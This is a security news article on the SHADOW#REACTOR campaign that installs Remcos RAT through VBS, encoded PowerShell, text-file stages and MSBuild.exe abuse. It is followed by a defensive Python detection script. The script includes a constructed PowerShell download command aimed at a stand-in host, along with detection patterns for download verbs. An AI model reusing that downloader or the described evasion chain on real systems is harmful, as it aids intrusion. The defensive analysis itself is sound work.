This New Windows Malware Hides in Plain Sight to Install Remcos RAT

SHADOW#REACTOR is a stealthy Windows malware campaign that delivers Remcos RAT through scripts, text-only payloads, and trusted system tools, giving attackers quiet, persistent control over Windows business networks.

Harsh Sharma

It does not crash systems or raise alarms. It blends into everyday Windows activity and works quietly in the background. By the time it is noticed, control may already be lost.


Security teams are tracking a new malware campaign, labeled SHADOW#REACTOR, that uses a carefully staged Windows attack chain to install the Remcos Remote Access Trojan (RAT). The operation relies on scripts, text-only payloads, and trusted Windows tools to quietly gain control of infected systems. Its structure points to a financially driven effort aimed at business networks of all sizes.

What SHADOW#REACTOR is

SHADOW#REACTOR is the name researchers have assigned to an active malware delivery campaign that installs Remcos RAT using a multi-stage loader framework. Rather than deploying malware through a single executable file, the campaign breaks the infection process into several smaller steps. Each stage prepares the next one, reducing visibility and complicating detection.

Remcos RAT itself is a commercially available remote administration tool. In legitimate environments, such tools are used for IT management and remote support. In this campaign, however, Remcos is used as a backdoor. Once installed, it allows an attacker to remotely access the infected system, execute commands, manage files, and monitor activity without the user’s awareness.


The campaign appears to be broad and opportunistic. It does not focus on a single industry or geography and instead targets both large enterprises and small-to-medium businesses. There is no confirmed attribution to a known threat group, but the tooling and execution style align with financially motivated activity, including operations commonly linked to initial access sellers.

A multi-step attack built to blend in

The SHADOW#REACTOR campaign uses a chain of small, connected steps rather than a single malicious file. The infection sequence begins with an obfuscated Visual Basic Script (VBS) file. Execution is likely triggered through user interaction, such as clicking on a link delivered via a socially engineered lure.

The VBS file is launched using wscript.exe, a legitimate Windows scripting host. This initial script does not contain the Remcos payload. Instead, it functions as a launcher that executes a hidden, Base64-encoded PowerShell command.


That PowerShell code connects to a remote server and downloads the next stage of the attack. Rather than retrieving a binary executable, it pulls down plain text files, which are less likely to be blocked or flagged by controls that key on executable downloads. These files are saved in the system's temporary directory and contain encoded fragments used later in the attack chain.

Text-only payloads and resilience logic

A notable feature of this campaign is its reliance on text-based intermediates. After the initial PowerShell stage runs, it drops a file such as qpwoe64.txt or qpwoe32.txt, depending on whether the infected system is 64-bit or 32-bit. PowerShell then checks that the file exists and meets a minimum size threshold. If the file is missing or incomplete, the script pauses and tries the download again. Even if the payload never reaches the required size within the defined time window, execution does not abort outright; the chain continues rather than failing hard.

This behavior helps the malware remain resilient in unstable network conditions. By retrying downloads and avoiding hard failures, the attack chain reduces the chance of breaking mid-execution, increasing the likelihood of a successful infection.


In-memory reconstruction and protected loaders

Once the text-based payload passes validation, the malware constructs a secondary PowerShell script in the temporary directory. This script invokes a loader protected with .NET Reactor, a software protection tool commonly abused by malware authors to hinder analysis.

The loader reconstructs and decodes additional components directly in memory. By limiting what is written to disk, the attackers reduce the artifacts available for file-based detection and forensic analysis. This stage is also responsible for retrieving the Remcos configuration from a remote server. In addition, the loader performs checks designed to avoid analysis environments. These include techniques intended to detect debugging tools and virtual machines often used by security researchers and automated sandboxes.

Abuse of trusted Windows tools

The final stage of the attack uses MSBuild.exe, Microsoft's signed build engine that ships with the .NET Framework, to execute the Remcos payload. MSBuild can compile and run code embedded in a project file, so an attacker who can drop a project file needs no separate executable on disk. This technique is commonly described as "living off the land": attackers abuse trusted system binaries to carry out malicious actions. Because MSBuild.exe is a signed Microsoft component used in normal development workflows, its misuse can blend in with routine activity, and some security controls cannot distinguish malicious execution from legitimate use.


The campaign also establishes persistence. Additional scripts are dropped to re-trigger the original VBS file through wscript.exe, allowing the malware to survive system restarts and maintain long-term access.

Broad targeting with financial motives

The campaign does not appear to be highly targeted. Instead, it casts a wide net across business environments, affecting both enterprises and smaller organizations. Researchers have found no evidence linking the activity to a specific known threat group.

The overall design suggests financial motivation. The focus on persistence, stealth, and portability is consistent with activity aimed at maintaining access rather than immediate disruption. Such access can later be sold, reused, or leveraged for further attacks.


Why this campaign matters

SHADOW#REACTOR highlights how modern Windows malware has evolved. Rather than relying on a single malicious executable, attackers now chain together scripts, text files, in-memory loaders, and trusted Windows utilities to stay hidden.

For defenders, the campaign underscores the importance of monitoring script execution, PowerShell activity, and unusual use of built-in Windows tools such as MSBuild.exe. Process-creation telemetry that records parent and child images (Sysmon Event ID 1, for example) exposes the wscript.exe to powershell.exe to MSBuild.exe chain; PowerShell script block logging (Event ID 4104) records the decoded form of Base64-encoded commands; and MSBuild.exe running on endpoints that are not developer or build machines, or launched by a script host, is worth an alert on its own. Attacks like this no longer stand out through obvious malware files. Instead, they unfold quietly within normal system behavior, making early detection more challenging.
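As an added example, not part of the article and not the campaign's own code, the Python script below applies those chain-level checks to a handful of constructed, Sysmon-style process-creation events (image, parent image, command line; the field extraction is assumed to have happened upstream). It decodes the Base64-of-UTF-16LE form that powershell.exe's -EncodedCommand switch expects, so the hidden downloader becomes readable, and it contrasts the malicious MSBuild.exe launch with a benign developer build. The encoded command, host name, user name and file paths are stand-ins built inline for illustration, not indicators from the campaign.

```python
"""Chain-level detection for the SHADOW#REACTOR-style sequence described above.

Added example: not the campaign's code and not any vendor's detection content.
Assumes Sysmon-style process-creation events already flattened into dicts with
"image", "parent" and "cmd" keys. All sample data below is constructed.
"""
import base64
import re
from typing import Optional

# Constructed stand-in for the hidden downloader the VBS launches. It mirrors
# the shape the article describes (fetch a .txt stage into %TEMP%) but points
# at a reserved, non-routable host. It is only ever decoded here, never run.
STAGE_DOWNLOADER = (
    "$u='http://example.invalid/qpwoe64.txt';"
    "$p=\"$env:TEMP\\qpwoe64.txt\";"
    "Invoke-WebRequest -Uri $u -OutFile $p"
)


def encode_powershell(cmd: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# -EncodedCommand accepts any unambiguous prefix; these are the common spellings.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # malformed Base64 or odd byte count
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"(?i)\\(?:temp|appdata|downloads|public)\\")
DOWNLOAD_VERB = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer")


def analyze(events):
    """Return (rule, image, detail) findings for a list of process-creation events.

    The rules key on parent/child relationships and on the decoded command,
    not on file hashes, because this campaign keeps its stages in text files
    and in memory rather than in a recognisable executable.
    """
    findings = []
    for ev in events:
        image, parent, cmd = _basename(ev["image"]), _basename(ev["parent"]), ev["cmd"]

        # 1. wscript/cscript running a script from a user-writable path: the
        #    initial lure, and the persistence re-launch of the same VBS.
        if image in ("wscript.exe", "cscript.exe") and USER_WRITABLE.search(cmd):
            findings.append(("script_host_user_writable_path", image, cmd))

        # 2. A script host spawning PowerShell: the VBS-to-PowerShell handoff.
        if image in ("powershell.exe", "pwsh.exe") and parent in ("wscript.exe", "cscript.exe"):
            findings.append(("script_host_spawns_powershell", image, parent))

        # 3. Encoded PowerShell: decode it so the analyst and the next rule can
        #    see what the hidden command actually does.
        decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
        if decoded is not None:
            findings.append(("encoded_powershell", image, decoded))
            # 4. Pulling a .txt stage into %TEMP%: the text-only payload step.
            low = decoded.lower()
            if DOWNLOAD_VERB.search(decoded) and ".txt" in low and "temp" in low:
                findings.append(("text_stage_download_to_temp", image, decoded))

        # 5. MSBuild started by a script host, or handed a project file from a
        #    user-writable path: the living-off-the-land execution stage.
        #    An IDE building a source tree does not fire this rule.
        if image == "msbuild.exe" and (parent in SCRIPT_HOSTS or USER_WRITABLE.search(cmd)):
            findings.append(("msbuild_lolbin_execution", image, f"parent={parent} cmd={cmd}"))
    return findings


# Constructed sample events following the article's chain, plus one benign build.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": "powershell.exe -w hidden -nop -enc " + encode_powershell(STAGE_DOWNLOADER)},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stage.xml"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj"},
]

if __name__ == "__main__":
    for rule, image, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {image}: {detail}")
```

Running the script prints five findings for the first three events and none for the Visual Studio build. In production the same rules would sit over a SIEM query rather than a Python list, but the decode step is the part worth keeping: alerting on "-enc" alone produces noise, while alerting on a decoded command that fetches a .txt file into %TEMP% does not.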
